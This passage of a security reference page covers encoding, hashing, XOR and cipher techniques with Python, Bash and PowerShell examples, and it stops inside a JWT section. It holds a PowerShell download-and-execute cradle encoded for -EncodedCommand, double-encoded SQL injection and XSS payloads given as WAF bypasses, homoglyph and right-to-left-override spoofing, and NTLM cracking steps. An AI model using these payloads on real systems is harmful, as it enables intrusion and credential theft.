BT
Privacy ToolboxJournalProjectsResumeBookmarks
Feed
Privacy Toolbox
Journal
Projects
Resume
Bookmarks
Intel
CIPHER
Threat Actors
Privacy Threats
Dashboard
CVEs
Tags
Intel
CIPHERThreat ActorsPrivacy ThreatsDashboardCVEsTags

Intel

  • Feed
  • Threat Actors
  • Privacy Threats
  • Dashboard
  • Privacy Toolbox
  • CVEs

Personal

  • Journal
  • Projects

Resources

  • Subscribe
  • Bookmarks
  • Developers
  • Tags
Cybersecurity News & Analysis
github
defconxt
•
© 2026
•
blacktemple.net
  • MITRE ATT&CK
  • Purple Team
  • OSINT Tradecraft
  • Recon Tools
  • ICS/SCADA
  • Mobile Security
  • Threat Intelligence
  • Emerging Threats
  • Breach Case Studies
  • Purple Team Exercises
  • DevSecOps
  • Secure Coding
  • Developer Security
  • Encoding & Manipulation
  • Network Protocols
  • AI Pentesting
  • Curated Resources
  • Supplementary
  • MITRE ATT&CK
  • Purple Team
  • OSINT Tradecraft
  • Recon Tools
  • ICS/SCADA
  • Mobile Security
  • Threat Intelligence
  • Emerging Threats
  • Breach Case Studies
  • Purple Team Exercises
  • DevSecOps
  • Secure Coding
  • Developer Security
  • Encoding & Manipulation
  • Network Protocols
  • AI Pentesting
  • Curated Resources
  • Supplementary
  1. CIPHER
  2. /Reference
  3. /Encoding, Decoding & Data Manipulation — Ultimate Reference

Encoding, Decoding & Data Manipulation — Ultimate Reference

Encoding, Decoding & Data Manipulation — Ultimate Reference

CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.


Table of Contents

  1. Base Encoding
  2. Hex Encoding
  3. URL Encoding
  4. HTML Entities
  5. Unicode
  6. Hashing
  7. XOR
  8. ROT13 / ROT47 / Caesar
  9. JWT
  10. Regular Expressions for Security
  11. Obfuscation & Deobfuscation
  12. Serialization Security
  13. Compression Security
  14. Binary & Struct Manipulation
  15. CyberChef Reference

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    pattern = r'^[A-Za-z0-9+/]*={0,2}$'
    return bool(re.match(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())
# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d
# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

  • Base64 is NOT encryption. Attackers use it to bypass naive content filters.
  • Double-base64 encoding is common in obfuscated payloads.
  • Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
  • PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.

Base32

Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MFYHA3DFNZSCA5DFON2CATQ='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mfyha3dfnzsca5dfon2catq=", casefold=True)
# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MFYHA3DFNZSCA5DFON2CATQ=
echo "MFYHA3DFNZSCA5DFON2CATQ=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # b'4HDeGkTpAkVKFsmvu'
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # b'@UX=hF)rM5Bl7Q+Df'
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # b'VPa!sWo2ML@;IANXJ~X'
decoded = base64.b85decode(encoded)
# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

Encoding Alphabet Padding Length multiple
Base64 A-Za-z0-9+/ = (0-2) 4
Base64url A-Za-z0-9-_ = or none 4
Base32 A-Z2-7 = (0-6) 8
Base58 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz None Variable
Base85 !-u (ASCII 33-117) None 5 per 4 bytes

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))

# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')
# ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20
# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)
# Decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

# Encode everything (even safe characters)
fully_encoded = quote("test", safe='')        # 'test' — all alpha safe by default
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not
# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"
# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

  • Double encoding bypasses WAFs that decode only once before rule matching.
  • %00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
  • %0d%0a = CRLF injection in HTTP headers.
  • Path normalization differences between proxy and backend enable smuggling.

4. HTML Entities

Named entities

import html

# Encode — only encodes &, <, >, " by default
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Encode with single quotes
encoded = html.escape("it's <dangerous>", quote=True)
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'
# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

  • Browsers decode HTML entities in attribute values: <a href="javascript:alert(1)"> works with entities.
  • Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
  • Null bytes in entities: &#0; may bypass filters.
  • Double encoding: &amp;lt; decodes to &lt; on first pass, < on second.

Quick reference table

Character Named Decimal Hex
< &lt; &#60; &#x3c;
> &gt; &#62; &#x3e;
& &amp; &#38; &#x26;
" &quot; &#34; &#x22;
' &apos; &#39; &#x27;
/ — &#47; &#x2f;

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # cafe + combining accent = "cafe\u0301" (visually: "cafe?")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 636166 65cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041       'A'  1 bytes  41
# U+00E9       'e'  2 bytes  c3a9
# U+4E16      '\u4e16'  3 bytes  e4b896
# U+1F600   '\U0001f600'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM + 'A'

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-9uf.com'

# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin
# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u006f'],    # Cyrillic о, Latin o
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

# Detection: normalize and compare
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()
echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash
$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'
echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()
echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'
echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

print(ntlm_hash("Password1"))
# 'a4f49c406510bdcab6824ee7c30fd852'

# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system
# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Additional heuristics
    if length == 32 and ':' not in h:
        # Could be MD5 or NTLM — check context
        pass
    return candidates
# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233626233a2962223626622327'...'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by printable ratio."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        printable = sum(1 for b in candidate if 32 <= b < 127)
        score = printable / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: find key for XOR-encoded shellcode
encoded = bytes([0x33, 0x26, 0x26, 0x33, 0x39, 0x29, 0x62, 0x33, 0x26, 0x62, 0x24, 0x33, 0x21, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Recover repeating key length using Hamming distance (Kasiski method)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]
# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233626233a2962223626622327')
key = 0x42
print(bytes(b ^ key for b in data))
"

# XOR file with a key using xortool
# pip install xortool
xortool -b -l 4 encrypted.bin           # guess key length
xortool -b -l 4 -c 00 encrypted.bin     # try assuming null byte is most frequent

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)
echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "p==246 2= 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"
echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
